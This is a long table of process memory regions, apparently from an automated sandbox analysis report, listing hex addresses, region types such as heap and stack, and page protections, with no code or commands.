|
heap
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
1FC252EE000
|
heap
|
page read and write
|
||
2484A153000
|
heap
|
page read and write
|
||
4C53CFF000
|
stack
|
page read and write
|
||
2484A45A000
|
heap
|
page read and write
|
||
1E181C10000
|
heap
|
page read and write
|
||
1FC256AF000
|
heap
|
page read and write
|
||
270D27BF000
|
heap
|
page read and write
|
||
1DD0E8A0000
|
heap
|
page read and write
|
||
1E0D6465000
|
heap
|
page read and write
|
||
20C72EF0000
|
heap
|
page read and write
|
||
1FC2560A000
|
heap
|
page read and write
|
||
1E0D6804000
|
heap
|
page read and write
|
||
239E6995000
|
trusted library allocation
|
page read and write
|
||
1C5500A1000
|
heap
|
page read and write
|
||
1DD0C808000
|
heap
|
page read and write
|
||
24545603000
|
heap
|
page read and write
|
||
270D2245000
|
heap
|
page read and write
|
||
270D2222000
|
heap
|
page read and write
|
||
1FC22D1B000
|
heap
|
page read and write
|
||
267A7680000
|
heap
|
page read and write
|
||
51D497E000
|
stack
|
page read and write
|
||
1FC25554000
|
heap
|
page read and write
|
||
2637A164000
|
heap
|
page read and write
|
||
23AC5B35000
|
heap
|
page read and write
|
||
5C54FC000
|
stack
|
page read and write
|
||
1E8E3FF1000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
2940C600000
|
heap
|
page read and write
|
||
2484A168000
|
heap
|
page read and write
|
||
7FFB0B6F1000
|
unkown
|
page execute and read and write
|
||
1FC26144000
|
heap
|
page read and write
|
||
239E48D2000
|
heap
|
page read and write
|
||
2C25EEF0000
|
heap
|
page read and write
|
||
2484A7EC000
|
heap
|
page read and write
|
||
1DD0C808000
|
heap
|
page read and write
|
||
D7416FE000
|
stack
|
page read and write
|
||
1E0E1601000
|
heap
|
page read and write
|
||
1FC24E7C000
|
heap
|
page read and write
|
||
1A2CE510000
|
heap
|
page read and write
|
||
CDBDC7F000
|
stack
|
page read and write
|
||
2BA38E50000
|
heap
|
page read and write
|
||
266F36DA000
|
heap
|
page read and write
|
||
1E0D643A000
|
heap
|
page read and write
|
||
270D27AE000
|
heap
|
page read and write
|
||
2422BD30000
|
heap
|
page read and write
|
||
76BB479000
|
stack
|
page read and write
|
||
236408A4000
|
heap
|
page read and write
|
||
23AC6107000
|
heap
|
page read and write
|
||
1E0D644F000
|
heap
|
page read and write
|
||
157757E000
|
stack
|
page read and write
|
||
25D4E191000
|
heap
|
page read and write
|
||
23AC5B56000
|
heap
|
page read and write
|
||
281FC3EF000
|
heap
|
page read and write
|
||
544A5FE000
|
unkown
|
page read and write
|
||
157737E000
|
stack
|
page read and write
|
||
165335C0000
|
heap
|
page read and write
|
||
23097D42000
|
heap
|
page read and write
|
||
1C5500DB000
|
heap
|
page read and write
|
||
7FFB0D720000
|
unkown
|
page readonly
|
||
1B3A8375000
|
heap
|
page read and write
|
||
27EA9A82000
|
heap
|
page read and write
|
||
1E0E1604000
|
heap
|
page read and write
|
||
270D2244000
|
heap
|
page read and write
|
||
1E0D6456000
|
heap
|
page read and write
|
||
239FE81F000
|
heap
|
page read and write
|
||
1FC25550000
|
heap
|
page read and write
|
||
1FC255C7000
|
heap
|
page read and write
|
||
1CEF25B2000
|
heap
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
267C19EB000
|
heap
|
page read and write
|
||
51D467E000
|
stack
|
page read and write
|
||
165335FE000
|
heap
|
page read and write
|
||
1690F72C000
|
heap
|
page read and write
|
||
267B9120000
|
trusted library allocation
|
page read and write
|
||
22972EB2000
|
heap
|
page read and write
|
||
2484A152000
|
heap
|
page read and write
|
||
1FC253DF000
|
heap
|
page read and write
|
||
1DCE32D0000
|
heap
|
page read and write
|
||
24545714000
|
heap
|
page read and write
|
||
17FCEFD4000
|
heap
|
page read and write
|
||
1CEF25A0000
|
heap
|
page read and write
|
||
579B2FE000
|
stack
|
page read and write
|
||
267A7964000
|
heap
|
page read and write
|
||
4C53E7E000
|
stack
|
page read and write
|
||
1FC2519E000
|
heap
|
page read and write
|
||
1B3A8350000
|
heap
|
page read and write
|
||
266F3067000
|
heap
|
page read and write
|
||
1CEF1FB0000
|
trusted library allocation
|
page read and write
|
||
266F3096000
|
heap
|
page read and write
|
||
2484A10F000
|
heap
|
page read and write
|
||
270D226D000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
23AC59C0000
|
heap
|
page read and write
|
||
1C550135000
|
heap
|
page read and write
|
||
1E7B5F00000
|
heap
|
page read and write
|
||
28425E61000
|
heap
|
page read and write
|
||
1E8E41D2000
|
heap
|
page read and write
|
||
1407B295000
|
heap
|
page read and write
|
||
23AC5AE0000
|
trusted library allocation
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
266F3093000
|
heap
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
1FC24EA8000
|
heap
|
page read and write
|
||
1E0D645F000
|
heap
|
page read and write
|
||
266F309C000
|
heap
|
page read and write
|
||
27EA9A7A000
|
heap
|
page read and write
|
||
15767FE000
|
unkown
|
page readonly
|
||
E6BFEFF000
|
stack
|
page read and write
|
||
2484C194000
|
heap
|
page read and write
|
||
1FC25566000
|
heap
|
page read and write
|
||
239FECD0000
|
heap
|
page read and write
|
||
165336E0000
|
heap
|
page read and write
|
||
267C1185000
|
heap
|
page read and write
|
||
1C54FF30000
|
heap
|
page read and write
|
||
79003FF000
|
stack
|
page read and write
|
||
1FC2533E000
|
heap
|
page read and write
|
||
239E8080000
|
trusted library allocation
|
page read and write
|
||
1407B2A2000
|
heap
|
page read and write
|
||
135F0601000
|
heap
|
page read and write
|
||
1407CAF0000
|
remote allocation
|
page read and write
|
||
1407C880000
|
heap
|
page read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
7FFB0C403000
|
unkown
|
page read and write
|
||
2484A453000
|
heap
|
page read and write
|
||
1DCE30EA000
|
heap
|
page read and write
|
||
1FC2561E000
|
heap
|
page read and write
|
||
24BA397B000
|
heap
|
page read and write
|
||
270D2220000
|
heap
|
page read and write
|
||
266F36B0000
|
heap
|
page read and write
|
||
1C5500C2000
|
heap
|
page read and write
|
||
239F6770000
|
trusted library allocation
|
page read and write
|
||
23DC3E72000
|
heap
|
page read and write
|
||
7FFAA9374000
|
trusted library allocation
|
page read and write
|
||
270D223A000
|
heap
|
page read and write
|
||
266F309F000
|
heap
|
page read and write
|
||
7FFB0D736000
|
unkown
|
page readonly
|
||
1690F739000
|
heap
|
page read and write
|
||
1FC25360000
|
heap
|
page read and write
|
||
2C25F010000
|
heap
|
page read and write
|
||
2DE1CEE0000
|
heap
|
page read and write
|
||
23195F14000
|
heap
|
page read and write
|
||
1E8E90F2000
|
trusted library allocation
|
page read and write
|
||
1C550280000
|
heap
|
page read and write
|
||
1E8E34F5000
|
trusted library allocation
|
page read and write
|
||
1407C842000
|
heap
|
page read and write
|
||
1FC24F6A000
|
heap
|
page read and write
|
||
23AC60FE000
|
heap
|
page read and write
|
||
1E0D9BA9000
|
direct allocation
|
page read and write
|
||
1FC24ECD000
|
heap
|
page read and write
|
||
7FFB0B801000
|
unkown
|
page execute and read and write
|
||
270D218B000
|
heap
|
page read and write
|
||
17FCEEB0000
|
heap
|
page read and write
|
||
23097D42000
|
heap
|
page read and write
|
||
1FC2526D000
|
heap
|
page read and write
|
||
9E60FF000
|
unkown
|
page read and write
|
||
1E0D6455000
|
heap
|
page read and write
|
||
7FF6DC73E000
|
unkown
|
page read and write
|
||
76BB7F8000
|
stack
|
page read and write
|
||
1FC252ED000
|
heap
|
page read and write
|
||
239E4A7D000
|
heap
|
page read and write
|
||
1CEF258F000
|
heap
|
page read and write
|
||
266F4F50000
|
heap
|
page read and write
|
||
76F4FFF000
|
stack
|
page read and write
|
||
1FC24E71000
|
heap
|
page read and write
|
||
1FC25C50000
|
direct allocation
|
page read and write
|
||
281FC3EF000
|
heap
|
page read and write
|
||
1FC255BF000
|
heap
|
page read and write
|
||
1FC253E4000
|
heap
|
page read and write
|
||
1AD18AC0000
|
heap
|
page read and write
|
||
23640854000
|
heap
|
page read and write
|
||
7FFAA9780000
|
trusted library allocation
|
page read and write
|
||
579B0FE000
|
stack
|
page read and write
|
||
281FC51B000
|
heap
|
page read and write
|
||
28425E6C000
|
heap
|
page read and write
|
||
1E8E3FD8000
|
heap
|
page read and write
|
||
627ABFF000
|
stack
|
page read and write
|
||
1E0E15EE000
|
heap
|
page read and write
|
||
266F36E2000
|
heap
|
page read and write
|
||
1CEF20A7000
|
heap
|
page read and write
|
||
2422BD40000
|
heap
|
page read and write
|
||
1E0E160B000
|
heap
|
page read and write
|
||
1E0E15B5000
|
heap
|
page read and write
|
||
28425E6C000
|
heap
|
page read and write
|
||
7FF74EEE0000
|
unkown
|
page readonly
|
||
1DEE7C85000
|
heap
|
page read and write
|
||
1FC251A9000
|
heap
|
page read and write
|
||
1FC25370000
|
heap
|
page read and write
|
||
1CEF2682000
|
heap
|
page read and write
|
||
1DD0C759000
|
heap
|
page read and write
|
||
1FC22D70000
|
heap
|
page read and write
|
||
270D4180000
|
heap
|
page read and write
|
||
13C876A1000
|
heap
|
page read and write
|
||
579ADFE000
|
stack
|
page read and write
|
||
281FC540000
|
heap
|
page read and write
|
||
1FC251A9000
|
heap
|
page read and write
|
||
239FE7C7000
|
heap
|
page read and write
|
||
1407C150000
|
trusted library section
|
page readonly
|
||
15C999F0000
|
heap
|
page read and write
|
||
270D404E000
|
heap
|
page read and write
|
||
2CFCBE6000
|
stack
|
page read and write
|
||
7FFAA96C0000
|
trusted library allocation
|
page read and write
|
||
23AC5B61000
|
heap
|
page read and write
|
||
1FC255D2000
|
heap
|
page read and write
|
||
608A07E000
|
stack
|
page read and write
|
||
1C55079F000
|
heap
|
page read and write
|
||
1EA2312C000
|
heap
|
page read and write
|
||
1DD10300000
|
heap
|
page read and write
|
||
1E4CFA0F000
|
heap
|
page read and write
|
||
1407CA30000
|
trusted library allocation
|
page read and write
|
||
1E0D6486000
|
heap
|
page read and write
|
||
24BA398A000
|
heap
|
page read and write
|
||
1E8E3502000
|
trusted library allocation
|
page read and write
|
||
1B3A8380000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
7FFB18B84000
|
unkown
|
page read and write
|
||
C6858FF000
|
unkown
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
7FFAA9550000
|
trusted library allocation
|
page execute and read and write
|
||
1FC25562000
|
heap
|
page read and write
|
||
202E56F0000
|
heap
|
page read and write
|
||
1DCE32C5000
|
heap
|
page read and write
|
||
1FC252E9000
|
heap
|
page read and write
|
||
579ACFE000
|
stack
|
page read and write
|
||
2364089F000
|
heap
|
page read and write
|
||
1FC25CC0000
|
heap
|
page read and write
|
||
20D43B0B000
|
heap
|
page read and write
|
||
23097D2B000
|
heap
|
page read and write
|
||
1FC2536B000
|
heap
|
page read and write
|
||
270D223E000
|
heap
|
page read and write
|
||
1E8E4049000
|
heap
|
page read and write
|
||
1FC24F69000
|
heap
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
1DD0FA38000
|
heap
|
page read and write
|
||
1C550781000
|
heap
|
page read and write
|
||
1909D650000
|
heap
|
page read and write
|
||
27EA9A72000
|
heap
|
page read and write
|
||
26A1C547000
|
heap
|
page read and write
|
||
1E0D645C000
|
heap
|
page read and write
|
||
76BB87E000
|
stack
|
page read and write
|
||
239FE837000
|
heap
|
page read and write
|
||
1E0D6510000
|
heap
|
page read and write
|
||
1E0D7FB0000
|
heap
|
page read and write
|
||
236408C1000
|
heap
|
page read and write
|
||
1407C8F2000
|
heap
|
page read and write
|
||
7FFB0C607000
|
unkown
|
page execute and read and write
|
||
7FFB0C5DB000
|
unkown
|
page execute and read and write
|
||
7FFB0B8AD000
|
unkown
|
page execute and read and write
|
||
7FFAA9710000
|
trusted library allocation
|
page read and write
|
||
1CEF2097000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
7FFAA9580000
|
trusted library allocation
|
page read and write
|
||
1E8E3FE2000
|
heap
|
page read and write
|
||
1FC22D12000
|
heap
|
page read and write
|
||
1700BB54000
|
heap
|
page read and write
|
||
2484A173000
|
heap
|
page read and write
|
||
1E0D7EC0000
|
direct allocation
|
page read and write
|
||
627A7FB000
|
stack
|
page read and write
|
||
7FFB1E479000
|
unkown
|
page execute and read and write
|
||
267AAA17000
|
trusted library allocation
|
page read and write
|
||
7FFAA9650000
|
trusted library allocation
|
page read and write
|
||
281FC2A0000
|
heap
|
page read and write
|
||
2940C2A0000
|
heap
|
page read and write
|
||
7FFAA9400000
|
trusted library allocation
|
page read and write
|
||
25D4E360000
|
heap
|
page read and write
|
||
15C99A91000
|
heap
|
page read and write
|
||
1909D570000
|
heap
|
page read and write
|
||
627AAFF000
|
unkown
|
page read and write
|
||
267AA7E4000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1FC2531B000
|
heap
|
page read and write
|
||
81D26FF000
|
stack
|
page read and write
|
||
270D2140000
|
trusted library allocation
|
page read and write
|
||
239FEA22000
|
heap
|
page read and write
|
||
A2D7DFF000
|
stack
|
page read and write
|
||
267AA9FD000
|
trusted library allocation
|
page read and write
|
||
281FC3E0000
|
heap
|
page read and write
|
||
1FC2613E000
|
heap
|
page read and write
|
||
7FFAA9760000
|
trusted library allocation
|
page read and write
|
||
1E8E404A000
|
heap
|
page read and write
|
||
1C5507A2000
|
heap
|
page read and write
|
||
1FC256CC000
|
heap
|
page read and write
|
||
231960B0000
|
heap
|
page read and write
|
||
1FC24F69000
|
heap
|
page read and write
|
||
1DD0C808000
|
heap
|
page read and write
|
||
281FC352000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1E0E1601000
|
heap
|
page read and write
|
||
1FC25980000
|
direct allocation
|
page read and write
|
||
1E0D64C0000
|
heap
|
page read and write
|
||
1FC25462000
|
heap
|
page read and write
|
||
D5945FF000
|
unkown
|
page read and write
|
||
281FC352000
|
heap
|
page read and write
|
||
27EA9A82000
|
heap
|
page read and write
|
||
281FC3F1000
|
heap
|
page read and write
|
||
281FC230000
|
heap
|
page read and write
|
||
1CEF2092000
|
heap
|
page read and write
|
||
16533730000
|
heap
|
page read and write
|
||
1E0E1592000
|
heap
|
page read and write
|
||
1690F6D0000
|
heap
|
page read and write
|
||
1E0E15B4000
|
heap
|
page read and write
|
||
239E4A70000
|
heap
|
page read and write
|
||
1E8E41E0000
|
heap
|
page read and write
|
||
1DD0E99E000
|
heap
|
page read and write
|
||
1E0E30A4000
|
heap
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
1FC25675000
|
heap
|
page read and write
|
||
1AD18B1D000
|
heap
|
page read and write
|
||
D21407F000
|
stack
|
page read and write
|
||
1FC255A9000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
239E835F000
|
trusted library allocation
|
page read and write
|
||
7FFB0BB90000
|
unkown
|
page readonly
|
||
2BA38B0A000
|
heap
|
page read and write
|
||
7FFB18B7C000
|
unkown
|
page execute and read and write
|
||
16533600000
|
heap
|
page read and write
|
||
1576E7E000
|
stack
|
page read and write
|
||
2584DAE0000
|
heap
|
page read and write
|
||
2584DAE0000
|
heap
|
page read and write
|
||
7FFAA9620000
|
trusted library allocation
|
page read and write
|
||
1C552024000
|
heap
|
page read and write
|
||
1FC22D40000
|
heap
|
page read and write
|
||
2322B3D4000
|
heap
|
page read and write
|
||
1DCE30E8000
|
heap
|
page read and write
|
||
D813FF6000
|
stack
|
page read and write
|
||
1FC25646000
|
heap
|
page read and write
|
||
1E0D644D000
|
heap
|
page read and write
|
||
270D2140000
|
trusted library allocation
|
page read and write
|
||
266F3083000
|
heap
|
page read and write
|
||
2B526AF4000
|
heap
|
page read and write
|
||
1FC25C5C000
|
direct allocation
|
page read and write
|
||
20D43AE8000
|
heap
|
page read and write
|
||
1B3A823D000
|
heap
|
page read and write
|
||
24BA3C95000
|
heap
|
page read and write
|
||
23AC5B69000
|
heap
|
page read and write
|
||
65B08FF000
|
stack
|
page read and write
|
||
1FC25D67000
|
heap
|
page read and write
|
||
1E0D645F000
|
heap
|
page read and write
|
||
8F797AB000
|
stack
|
page read and write
|
||
1FC255C1000
|
heap
|
page read and write
|
||
24B86AC0000
|
heap
|
page read and write
|
||
1FC26146000
|
heap
|
page read and write
|
||
270D27C9000
|
heap
|
page read and write
|
||
1FC25626000
|
heap
|
page read and write
|
||
1E0E1578000
|
heap
|
page read and write
|
||
1C550067000
|
heap
|
page read and write
|
||
270D21E7000
|
heap
|
page read and write
|
||
7FF74EE71000
|
unkown
|
page execute read
|
||
22972EC2000
|
heap
|
page read and write
|
||
1E181D00000
|
heap
|
page read and write
|
||
1CEF2580000
|
heap
|
page read and write
|
||
1E8E34FB000
|
trusted library allocation
|
page read and write
|
||
1CEF1FB0000
|
trusted library allocation
|
page read and write
|
||
24545602000
|
heap
|
page read and write
|
||
7FFB1BB2C000
|
unkown
|
page execute and write copy
|
||
28425E69000
|
heap
|
page read and write
|
||
7FFAA9683000
|
trusted library allocation
|
page read and write
|
||
28425E59000
|
heap
|
page read and write
|
||
776FAFF000
|
stack
|
page read and write
|
||
1C28FFF000
|
unkown
|
page read and write
|
||
1FC2531E000
|
heap
|
page read and write
|
||
1E0D9940000
|
direct allocation
|
page read and write
|
||
2484A48B000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
D213D3D000
|
stack
|
page read and write
|
||
1E0E1619000
|
heap
|
page read and write
|
||
7FFAA936B000
|
trusted library allocation
|
page read and write
|
||
1AB5E297000
|
heap
|
page read and write
|
||
4C53C7F000
|
stack
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1FC25D76000
|
heap
|
page read and write
|
||
2484A0E0000
|
trusted library allocation
|
page read and write
|
||
1FC256B8000
|
heap
|
page read and write
|
||
7FFB0C2B0000
|
unkown
|
page read and write
|
||
1E4CFA15000
|
heap
|
page read and write
|
||
1407C160000
|
trusted library section
|
page readonly
|
||
1C550127000
|
heap
|
page read and write
|
||
2484A137000
|
heap
|
page read and write
|
||
270D27D2000
|
heap
|
page read and write
|
||
76BB3FF000
|
stack
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
1700B7E0000
|
heap
|
page read and write
|
||
1DD0FB22000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
266F3094000
|
heap
|
page read and write
|
||
1DD0C75E000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
1FC24F4F000
|
heap
|
page read and write
|
||
1DCE30F2000
|
heap
|
page read and write
|
||
270D27B4000
|
heap
|
page read and write
|
||
2484A113000
|
heap
|
page read and write
|
||
1FC2533A000
|
heap
|
page read and write
|
||
1FC252ED000
|
heap
|
page read and write
|
||
E0903CC000
|
stack
|
page read and write
|
||
1FC256C4000
|
heap
|
page read and write
|
||
267A78A0000
|
heap
|
page execute and read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
270D218A000
|
heap
|
page read and write
|
||
7FF6DC744000
|
unkown
|
page readonly
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1DD0FAA0000
|
heap
|
page read and write
|
||
2322B430000
|
heap
|
page read and write
|
||
1CEF25B4000
|
heap
|
page read and write
|
||
23DC3E62000
|
heap
|
page read and write
|
||
B2B887D000
|
stack
|
page read and write
|
||
26379DB0000
|
heap
|
page read and write
|
||
1E0E3090000
|
heap
|
page readonly
|
||
1DEE7CBB000
|
heap
|
page read and write
|
||
1FC256C4000
|
heap
|
page read and write
|
||
266F4F66000
|
heap
|
page read and write
|
||
266F36D9000
|
heap
|
page read and write
|
||
281FC2E0000
|
heap
|
page read and write
|
||
7FFAA95E0000
|
trusted library allocation
|
page read and write
|
||
1E0E15F7000
|
heap
|
page read and write
|
||
1CEF268B000
|
heap
|
page read and write
|
||
1E7B5F70000
|
heap
|
page read and write
|
||
245456F0000
|
heap
|
page read and write
|
||
1FC255D0000
|
heap
|
page read and write
|
||
266F36C8000
|
heap
|
page read and write
|
||
1DD0C739000
|
heap
|
page read and write
|
||
1690F6C0000
|
heap
|
page read and write
|
||
1407C8C6000
|
heap
|
page read and write
|
||
93AF4FC000
|
stack
|
page read and write
|
||
1C550799000
|
heap
|
page read and write
|
||
2DE1CD00000
|
heap
|
page read and write
|
||
1E0E161F000
|
heap
|
page read and write
|
||
135F0601000
|
heap
|
page read and write
|
||
1E8E41E1000
|
heap
|
page read and write
|
||
1DD0FB2A000
|
heap
|
page read and write
|
||
1CE587C7000
|
heap
|
page read and write
|
||
281FC3FB000
|
heap
|
page read and write
|
||
270D2229000
|
heap
|
page read and write
|
||
1E0D649D000
|
heap
|
page read and write
|
||
23AC5B61000
|
heap
|
page read and write
|
||
1E8E404A000
|
heap
|
page read and write
|
||
28425E5D000
|
heap
|
page read and write
|
||
2484A166000
|
heap
|
page read and write
|
||
270D21E7000
|
heap
|
page read and write
|
||
1E5FA760000
|
heap
|
page read and write
|
||
1DD0C735000
|
heap
|
page read and write
|
||
1BCD0E40000
|
heap
|
page read and write
|
||
7FFB1C265000
|
unkown
|
page execute and read and write
|
||
51D44FC000
|
stack
|
page read and write
|
||
13C87680000
|
heap
|
page read and write
|
||
2484A138000
|
heap
|
page read and write
|
||
267AA633000
|
trusted library allocation
|
page read and write
|
||
1E0D6451000
|
heap
|
page read and write
|
||
2484C182000
|
heap
|
page read and write
|
||
23AC5B55000
|
heap
|
page read and write
|
||
1FC26160000
|
heap
|
page read and write
|
||
130EBFF000
|
unkown
|
page read and write
|
||
7FFB0D736000
|
unkown
|
page readonly
|
||
267AA62F000
|
trusted library allocation
|
page read and write
|
||
236408C4000
|
heap
|
page read and write
|
||
1E8E4056000
|
heap
|
page read and write
|
||
135F05E0000
|
heap
|
page read and write
|
||
1FC24F4C000
|
heap
|
page read and write
|
||
7FF6DC700000
|
unkown
|
page readonly
|
||
270D2231000
|
heap
|
page read and write
|
||
1FC25F8B000
|
heap
|
page read and write
|
||
2484A2D0000
|
trusted library allocation
|
page read and write
|
||
1FC2540D000
|
heap
|
page read and write
|
||
B26CF7E000
|
stack
|
page read and write
|
||
1DD0FB22000
|
heap
|
page read and write
|
||
270D404E000
|
heap
|
page read and write
|
||
1FC25564000
|
heap
|
page read and write
|
||
1C5500EB000
|
heap
|
page read and write
|
||
23AC6139000
|
heap
|
page read and write
|
||
7FFAA96DA000
|
trusted library allocation
|
page read and write
|
||
2484A177000
|
heap
|
page read and write
|
||
1CEF25AC000
|
heap
|
page read and write
|
||
1C5500F9000
|
heap
|
page read and write
|
||
29AC2480000
|
heap
|
page read and write
|
||
1DD0E99E000
|
heap
|
page read and write
|
||
20D43B07000
|
heap
|
page read and write
|
||
7FFAA9430000
|
trusted library allocation
|
page read and write
|
||
1FC255BF000
|
heap
|
page read and write
|
||
23195F15000
|
heap
|
page read and write
|
||
267A7758000
|
heap
|
page read and write
|
||
7FFB0C5B5000
|
unkown
|
page execute and write copy
|
||
7FF74EF1E000
|
unkown
|
page readonly
|
||
1FC2534A000
|
heap
|
page read and write
|
||
20D43AD6000
|
heap
|
page read and write
|
||
7FFB1AB15000
|
unkown
|
page execute and read and write
|
||
1E8E404A000
|
heap
|
page read and write
|
||
7FFB0BA60000
|
unkown
|
page execute and read and write
|
||
1C550010000
|
heap
|
page read and write
|
||
281FC3E7000
|
heap
|
page read and write
|
||
92C156D000
|
stack
|
page read and write
|
||
281FC31F000
|
heap
|
page read and write
|
||
7FFAA96C0000
|
trusted library allocation
|
page read and write
|
||
1E8E3515000
|
trusted library allocation
|
page read and write
|
||
13C8768A000
|
heap
|
page read and write
|
||
CB1DCFC000
|
stack
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
1E0E2FAC000
|
heap
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
1FC2530F000
|
heap
|
page read and write
|
||
87C017E000
|
stack
|
page read and write
|
||
1E0E1601000
|
heap
|
page read and write
|
||
1FC25338000
|
heap
|
page read and write
|
||
1407C906000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
244EE394000
|
heap
|
page read and write
|
||
281FC345000
|
heap
|
page read and write
|
||
B2B8538000
|
stack
|
page read and write
|
||
1FC25601000
|
heap
|
page read and write
|
||
2BA38CD0000
|
heap
|
page read and write
|
||
23AC5BF0000
|
trusted library allocation
|
page read and write
|
||
270D2244000
|
heap
|
page read and write
|
||
1407D000000
|
heap
|
page read and write
|
||
135F0805000
|
heap
|
page read and write
|
||
1E8E3525000
|
trusted library allocation
|
page read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
5C56FF000
|
stack
|
page read and write
|
||
16533617000
|
heap
|
page read and write
|
||
1FC2564C000
|
heap
|
page read and write
|
||
267B9182000
|
trusted library allocation
|
page read and write
|
||
23097D3A000
|
heap
|
page read and write
|
||
2484A162000
|
heap
|
page read and write
|
||
1407BA02000
|
heap
|
page read and write
|
||
1576FFE000
|
unkown
|
page readonly
|
||
1FC25371000
|
heap
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
2BA9E645000
|
heap
|
page read and write
|
||
1E0E15E5000
|
heap
|
page read and write
|
||
1E0D64DA000
|
heap
|
page read and write
|
||
1BCD0E4B000
|
heap
|
page read and write
|
||
7FF74EE70000
|
unkown
|
page readonly
|
||
1FC2612D000
|
heap
|
page read and write
|
||
1FC2559D000
|
heap
|
page read and write
|
||
267AA9E6000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1E0E15D0000
|
heap
|
page read and write
|
||
1407B2FF000
|
heap
|
page read and write
|
||
266F36D9000
|
heap
|
page read and write
|
||
270D4043000
|
heap
|
page read and write
|
||
23098015000
|
heap
|
page read and write
|
||
2484A0E0000
|
trusted library allocation
|
page read and write
|
||
270D2266000
|
heap
|
page read and write
|
||
2BA38CF0000
|
heap
|
page read and write
|
||
1FC2559D000
|
heap
|
page read and write
|
||
266F3076000
|
heap
|
page read and write
|
||
8251FCE000
|
stack
|
page read and write
|
||
1FC25312000
|
heap
|
page read and write
|
||
7E7A3BF000
|
stack
|
page read and write
|
||
270D218E000
|
heap
|
page read and write
|
||
1FC2613B000
|
heap
|
page read and write
|
||
7FF74EF18000
|
unkown
|
page readonly
|
||
1E4CF9C9000
|
heap
|
page read and write
|
||
1C550123000
|
heap
|
page read and write
|
||
1DEE7CAC000
|
heap
|
page read and write
|
||
267C1110000
|
trusted library allocation
|
page read and write
|
||
7FFAA9383000
|
trusted library allocation
|
page execute and read and write
|
||
1FC246E0000
|
heap
|
page read and write
|
||
23AC610E000
|
heap
|
page read and write
|
||
23AC5B66000
|
heap
|
page read and write
|
||
1E0E1619000
|
heap
|
page read and write
|
||
266F3042000
|
heap
|
page read and write
|
||
1FC25359000
|
heap
|
page read and write
|
||
1A2CE4B0000
|
heap
|
page read and write
|
||
1E8E34FB000
|
trusted library allocation
|
page read and write
|
||
1E0E15E1000
|
heap
|
page read and write
|
||
267A9338000
|
trusted library allocation
|
page read and write
|
||
15768FD000
|
stack
|
page read and write
|
||
B26CEFF000
|
stack
|
page read and write
|
||
1FC2561A000
|
heap
|
page read and write
|
||
1C55076B000
|
heap
|
page read and write
|
||
1407C8A0000
|
trusted library allocation
|
page read and write
|
||
270D226A000
|
heap
|
page read and write
|
||
1E8E3FF1000
|
heap
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
1FC2612A000
|
heap
|
page read and write
|
||
270D2232000
|
heap
|
page read and write
|
||
7FFAA937D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
BAC7EFF000
|
stack
|
page read and write
|
||
1FC255B2000
|
heap
|
page read and write
|
||
1FC25332000
|
heap
|
page read and write
|
||
1FC24E70000
|
heap
|
page read and write
|
||
CB1DEFF000
|
stack
|
page read and write
|
||
1FC25656000
|
heap
|
page read and write
|
||
1FC24ABC000
|
direct allocation
|
page read and write
|
||
1E8E4644000
|
heap
|
page read and write
|
||
1FC251C7000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
23AC6129000
|
heap
|
page read and write
|
||
1FC2566D000
|
heap
|
page read and write
|
||
2484A7F9000
|
heap
|
page read and write
|
||
1FC2532D000
|
heap
|
page read and write
|
||
1E0E1700000
|
trusted library allocation
|
page read and write
|
||
23640860000
|
heap
|
page read and write
|
||
26379E71000
|
heap
|
page read and write
|
||
2484A137000
|
heap
|
page read and write
|
||
270D2232000
|
heap
|
page read and write
|
||
1E0D64CC000
|
heap
|
page read and write
|
||
2584DC20000
|
heap
|
page read and write
|
||
239FEA2C000
|
heap
|
page read and write
|
||
7FFAA9550000
|
trusted library allocation
|
page read and write
|
||
23AC79E1000
|
heap
|
page read and write
|
||
87C007E000
|
stack
|
page read and write
|
||
1CEF2092000
|
heap
|
page read and write
|
||
1FC22D40000
|
heap
|
page read and write
|
||
1FC25656000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1E0E1622000
|
heap
|
page read and write
|
||
23DC3E50000
|
heap
|
page read and write
|
||
1FC25659000
|
heap
|
page read and write
|
||
1DD0FB12000
|
heap
|
page read and write
|
||
1DD0FAC8000
|
heap
|
page read and write
|
||
239E4710000
|
heap
|
page read and write
|
||
1C5500A1000
|
heap
|
page read and write
|
||
135F0570000
|
heap
|
